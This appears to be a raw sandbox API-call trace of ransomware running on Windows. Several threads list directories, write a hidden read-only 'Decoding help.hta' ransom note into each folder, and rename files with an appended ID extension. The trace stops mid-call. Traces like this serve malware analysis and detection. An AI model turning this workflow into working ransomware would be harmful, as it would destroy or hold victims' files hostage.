[0057.103] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.103] FindNextFileW (in: hFindFile=0x5db6f8, lpFindFileData=0x2daafd30 | out: lpFindFileData=0x2daafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0057.103] lstrcpyW (in: lpString1=0x244e8190, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*" [0057.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*") returned 64 [0057.103] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\Decoding help.hta" [0057.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\decoding help.hta")) returned 0xffffffff [0057.103] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc [0059.034] WriteFile (in: hFile=0x3cc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2daafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2daafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.502] CloseHandle (hObject=0x3cc) returned 1 [0061.601] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 910 os_tid = 0x824 [0059.646] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*", lpFindFileData=0x2dbefd30 | out: lpFindFileData=0x2dbefd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcbd8 [0059.650] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.650] FindNextFileW (in: hFindFile=0x10fbcbd8, lpFindFileData=0x2dbefd30 | out: lpFindFileData=0x2dbefd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.651] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.651] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.651] FindNextFileW (in: hFindFile=0x10fbcbd8, lpFindFileData=0x2dbefd30 | out: lpFindFileData=0x2dbefd30*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0059.651] lstrcpyW (in: lpString1=0x3402328, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" [0059.651] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned 76 [0059.651] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta" [0059.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\decoding help.hta")) returned 0xffffffff [0059.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x870 [0061.248] WriteFile (in: hFile=0x870, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2dbefcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2dbefcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.249] CloseHandle (hObject=0x870) returned 1 [0061.249] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.249] lstrcmpiW (lpString1="Decoding help.hta", lpString2="7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 1 [0061.249] lstrlenW (lpString="7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 32 [0061.249] lstrcmpiW (lpString1="[ID]", lpString2="5EC9") returned -1 [0061.249] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" [0061.249] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned 76 [0061.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\", lpString2="7B2238AACCEDC3F1FFE8E7EB5F575EC9" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" [0061.249] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" [0061.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.[ID]g9uZrLhJaygpwRm1[ID]" [0061.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.[id]g9uzrlhjaygpwrm1[id]")) Thread: id = 911 os_tid = 0x7b4 [0059.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*", lpFindFileData=0x2dd2fd30 | out: lpFindFileData=0x2dd2fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x2b43f6d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2b43f6d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcb98 [0059.649] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.650] FindNextFileW (in: hFindFile=0x10fbcb98, lpFindFileData=0x2dd2fd30 | out: lpFindFileData=0x2dd2fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x2b43f6d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2b43f6d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.650] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.650] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.650] FindNextFileW (in: hFindFile=0x10fbcb98, lpFindFileData=0x2dd2fd30 | out: lpFindFileData=0x2dd2fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b43f6d0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x2b43f6d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2b43f6d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0059.650] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*" [0059.650] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*") returned 64 [0059.650] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Decoding help.hta" [0059.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\decoding help.hta")) returned 0x2020 Thread: id = 912 os_tid = 0x8d8 [0059.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*", lpFindFileData=0x2de6fd30 | out: lpFindFileData=0x2de6fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcc18 [0059.654] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.654] FindNextFileW (in: hFindFile=0x10fbcc18, lpFindFileData=0x2de6fd30 | out: lpFindFileData=0x2de6fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.655] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.655] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.655] FindNextFileW (in: hFindFile=0x10fbcc18, lpFindFileData=0x2de6fd30 | out: lpFindFileData=0x2de6fd30*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0059.655] lstrcpyW (in: lpString1=0x116f9b48, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" [0059.655] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned 77 [0059.655] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta" [0059.655] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\decoding help.hta")) returned 0xffffffff [0059.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x870 [0061.250] WriteFile (in: hFile=0x870, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2de6fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2de6fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.251] CloseHandle (hObject=0x870) returned 1 [0061.251] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.251] lstrcmpiW (lpString1="Decoding help.hta", lpString2="7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 1 [0061.251] lstrlenW (lpString="7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 32 [0061.251] lstrcmpiW (lpString1="[ID]", lpString2="5EC9") returned -1 [0061.251] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" [0061.251] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned 77 [0061.251] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\", lpString2="7B2238AACCEDC3F1FFE8E7EB5F575EC9" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" [0061.251] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" [0061.252] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.[ID]g9uZrLhJaygpwRm1[ID]" [0061.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.[id]g9uzrlhjaygpwrm1[id]")) Thread: id = 913 os_tid = 0x878 [0059.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*", lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcc58 [0059.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.663] FindNextFileW (in: hFindFile=0x10fbcc58, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.663] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.663] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.663] FindNextFileW (in: hFindFile=0x10fbcc58, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0059.663] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0059.663] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0059.663] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0059.664] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*" [0059.664] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*") returned 83 [0059.664] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033" [0059.664] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*.*" [0059.664] GlobalMemoryStatus (in: lpBuffer=0x11adfd10 | out: lpBuffer=0x11adfd10) [0059.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10bc64c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xddc [0059.670] CloseHandle (hObject=0xddc) returned 1 [0059.670] FindNextFileW (in: hFindFile=0x10fbcc58, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c366f00, ftCreationTime.dwHighDateTime=0x1cac0be, ftLastAccessTime.dwLowDateTime=0x6193ae30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c366f00, ftLastWriteTime.dwHighDateTime=0x1cac0be, nFileSizeHigh=0x0, nFileSizeLow=0x267d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="FPSRVUTL.DLL", cAlternateFileName="")) returned 1 [0059.670] lstrcpyW (in: lpString1=0x11701b50, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*" [0059.670] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*") returned 83 [0059.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta" [0059.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\decoding help.hta")) returned 0xffffffff [0059.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x870 [0061.253] WriteFile (in: hFile=0x870, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x11adfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x11adfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.253] CloseHandle (hObject=0x870) returned 1 [0061.254] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.254] lstrcmpiW (lpString1="Decoding help.hta", 